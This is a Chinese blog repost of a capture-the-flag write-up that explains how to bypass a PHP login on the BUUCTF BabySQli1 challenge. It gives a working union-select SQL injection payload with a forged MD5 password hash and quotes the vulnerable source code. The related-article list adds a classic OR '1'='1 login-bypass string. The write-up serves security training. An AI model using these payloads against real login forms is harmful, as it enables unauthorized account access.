php绕过验证,php后台验证两种方式绕过

最新推荐文章于 2024-06-02 12:30:00 发布
最新推荐文章于 2024-06-02 12:30:00 发布
阅读量1.2k 收藏 3
点赞数
文章标签: php绕过验证

php后台验证两种方式绕过

前言

环境:buuctf中[GXYCTF2019]BabySQli1

知识点:两种验证方式,密码绕过

参考:博客

做题

sql注入,fuzz过滤了(,),=,or

然后就琢磨着都过滤了(),函数都不能用,还怎么进行sql注入

尝试着成功登录进去

1‘||1 like 1# !!!,没有成功登进去,这说明后台查询方式不是类似

where user=‘‘ and password=‘‘

这题给了源码

用户登录两种业务查询方式

一种是直接对用户输入的账号名和密码进行查询

142.png

d856f585730868e227f951269c1ab694.png

另一种是针对用户输入的账号名进行查询对应的密码,再和用户输入的密码做比较

143.png

eecb4185b379186197682047515068da.png

根据题目的源码,显然是第二种

要绕过第二种可以利用union select

构造name=mi‘union select 1,‘admin‘,‘b6d767d2f8ed5d21a44b0e5886680cb9‘#&pw=22 成功绕过

拿到flag

部分源码

if(preg_match("/\(|\)|\=|or/", $name)){

die("do not hack me!");

}

else{

if (!$result) {

printf("Error: %s\n", mysqli_error($con));

exit();

}

else{

// echo ‘

‘;

$arr = mysqli_fetch_row($result);

// print_r($arr);

if($arr[1] == "admin"){

if(md5($password) == $arr[2]){

echo $flag;

}

else{

die("wrong pass!");

}

}

else{

die("wrong user!");

}

}

}

原文:https://www.cnblogs.com/NineOne/p/14044572.html

影视后期王荣
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php+mysql复现登录验证绕过
野原新之助
12-08 1070
文章目录一、简述二、绕过原理三、代码实现四、绕过测试 一、简述 所谓登录验证绕过即在进行身份验证时,使用一些特殊的字符,绕过身份认证,从而成功登陆。 登陆验证绕过可分别从用户名和密码两处进行绕过。 二、绕过原理 万能密码绕过的原理是利用逻辑关系 and、or以及SQL语言的注释符,来达到绕过验证的目的。 尤其注意:SQL中,优先级 and > or 因此,当有语句:a > b and...
PHP、mysql(手工注入)
10-12
- 示例:一个简单的登录表单可能接收用户名和密码,如果未进行适当验证,攻击者可以通过输入如"admin' OR '1'='1 --"这样的字符串,绕过身份验证。 2. **PHP与MySQL手工注入的常见手法** - **联合查询注入**:...
后台php验证,推荐10款常用的后台验证用法,欢迎查看
weixin_33270404的博客
03-18 125
这篇文章主要介绍了织梦DEDECMS后台验证码错误不能正常验证的3种可能原因和解决方法,需要的朋友可以参考下dedecms模板下载地址: www.php.cn/xiazai/code/dedecms经常看到很多人发帖称自己用织梦建的站在使用一段时间后会出现进不了后台,明明验证码是对的但提示说验证码不对。今天就花了时间整理了一些相关方法,主要有下面几种:解决一: data/session 保存不成功...
【谨慎学习】手把手教你破解网站管理后台帐号密码
最新发布
m0_61869253的博客
06-02 731
如果有朋友仔细的跟着教程去做去完成并加以思考了之后,会发现在教程中我们还有一个敏感的信息源,那就是我们的网关(换句话说就是我们的路由器),这个设备管控这我们电脑上所有的数据流,一旦我们的网关被不法份子所控制,那我们所有的数据将被监听、一旦不法份子通过某种工具或某种手段还原了我们的数据,那后果将是不可估量的,所以大家在日常中还要对自己网络的出口网关加以防护,尽量通过去做好每一个细节而保证我的网络安全。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
PHP绕过网站登录,绕过验证码,模拟登录 php
weixin_42598278的博客
03-10 1746
这几天一直在做识别验证码的API,已经做出来了,不过我突然有发现可以绕过验证码,先上代码header("Content-Type: text/html; charset=utf-8");function login_get($url, $cookie) {$curl = curl_init();//初始化curl模块curl_setopt($curl, CURLOPT_URL, $url);//登...
php post验证输入,PHP简单post验证绕过
weixin_39938746的博客
03-10 729
if($_POST[user] && $_POST[pass]) {$conn = mysql_connect("*******", "****", "****");mysql_select_db("****") or die("Could not select database");if ($conn->connect_error) {die("Connection fai...
php 密码验证错误,PHP密码验证已被绕过
weixin_39674293的博客
03-09 100
我希望用户输入4个密码之一才能访问我的网站.登陆页面是index.html,重定向页面应该是home.html我使用了以下代码,并且使用了if语句来哈希输入的密码,并将其与4个可接受的hases进行比较.如果它们匹配,那么我希望页面重定向.否则,我想显示一个JS警报.我的问题是,即使输入了错误的密码,它仍然会重定向而不会发出警报.//Take the values from the html fo...
php 绕过cookie验证码,selenium+cookie跳过验证登录实现步奏详解
weixin_30077373的博客
03-18 380
这次给大家带来selenium+cookie跳过验证登录实现步奏详解,selenium+cookie跳过验证登录的注意事项有哪些,下面就是实战案例,一起来看一下。之前介绍过通过cookie 绕过验证码实现登录的方法。这里并不多余,会增加分析和另外一种方法实现登录。1、思路介绍1.1、直接看代码,内有详细注释说明# FileName : Wm_Cookie_Login.py# Author :...
注册时通过ajax来核对禁止注册的用户名插件 for PHP168.rar
07-14
对比两种匹配方式,全面匹配更严格,只有完全一致的用户名才会被禁止,这可能会减少误报,但可能让一些意图绕过禁令的用户有机会。而部分匹配虽然更宽松,但能有效防止用户使用禁止用户名的变体或包含禁止词汇的...
php html5 flash 上传
12-19
为了实现无刷新上传和进度条,HTML5和Flash可以这样结合使用:HTML5负责获取文件并初始化上传,Flash作为一个插件在后台处理实际的文件传输,因为它可以绕过某些浏览器的同源策略限制,支持大文件分块上传,并且能够...
form验证与动态验证框架
03-18
后端验证确保即使前端被绕过,服务器也能保护数据的完整性。 **动态验证框架** 动态验证框架是一种更为灵活的验证方式,它可以根据不同的业务场景动态生成验证规则。动态验证通常涉及到元数据、策略引擎和规则库。...
phpweb跳过验证文件
03-14
phpweb跳过验证文件,跳过直接安装就行了` 把此文件使用二进制上传覆盖到base/install里面运行网址安装即可.
一个简单的ajax验证登录
09-12
服务器端验证是必不可少的,因为前端验证可以被用户绕过。 以下是实现Ajax登录验证的基本步骤: 1. 创建HTML表单:构建一个包含用户名和密码输入框以及登录按钮的简单HTML表单。例如: ```html 用户名" required...
file_put_contents 绕过$contents=“<?php die();?>“.$contents,preg_match
feiniaotjx的博客
11-19 2049
绕过<?php die();?>,preg_match 大概意思是传文件名和文件内容,但是两个参数都要经过waf函数过滤,并且文件内容开头加了<?php die();?>,它的意思是直接结束了php语句的执行,相当与exit()退出执行函数,故导致写入php文件的函数无法执行所以我们需要让<?php die()?>不能执行,故可以使用php伪协议写入文件, 利用php://filter/convert.base64-decode/resource=5.php写入文件, $
php语句 绕过验证,知道login.php的源码,该怎么构造语句绕过验证
weixin_29438011的博客
03-10 146
[PHP] 纯文本查看 复制代码Masel's secure site重置数据库include("auth.php");$servername = $host;$username = $dbuser;$password = $dbpass;$database = $dbname;error_reporting(0);if($_POST["user"] && $_POST["pass...
phpweb程序跳过会员验证方法
weixin_33901641的博客
04-05 884
现在用phpweb的程序是很多的,官方的版本安装的时候有会员验证,而这个会员只有代理商才能注册,想支持phpweb都不行,还弄这一步。 不过我们可以删除些代码跳过这一布 下载的源码找到目录base\install\中的index.php 打开找到代码: if ($_POST['nextstep'] == 1) { $c_params...
本地php怎么越过账号密码,PHP中md5绕过
weixin_28792813的博客
03-11 352
一、md5($password,true)的SQL注入问题这里要提到一下MySQL中的数值比较问题。1、当数字和字符串比较时,若字符串的数字部分(需要从头开始)和数字是相同的,那么则返回的是true。select if(1="1abcd","等于","不等于") as test;if(exp1,stat1,stat2)类似于高级语言中三元运算符。当exp1为true的是否返回stat1,为fals...
怎么绕过PHP的防护,PHP代码层防护与绕过
weixin_30844577的博客
03-18 485
0x01 前言在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。Bypass思路:只考虑关键字被过滤如何进行Bypass的问题,暂不考虑关键字替换绕过的情况。0x02 关键字过滤1、使用strpos过滤关键字PHP过滤代...
PHP弱类型及绕过方式(一)
qidiandexiaowu
05-03 1938
前言:学长带着我们学习了一些PHP弱类型,现在总结记一下。 目录: 0×01.extract函数变量覆盖 0×02.strcmp函数数组漏洞 0×03.urldecode二次密码绕过 0×04.md5函数加密 0×05.数组返回NULL绕过 0×06.弱类型整数大小比较绕过 0×07.sha()函数比较绕过 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值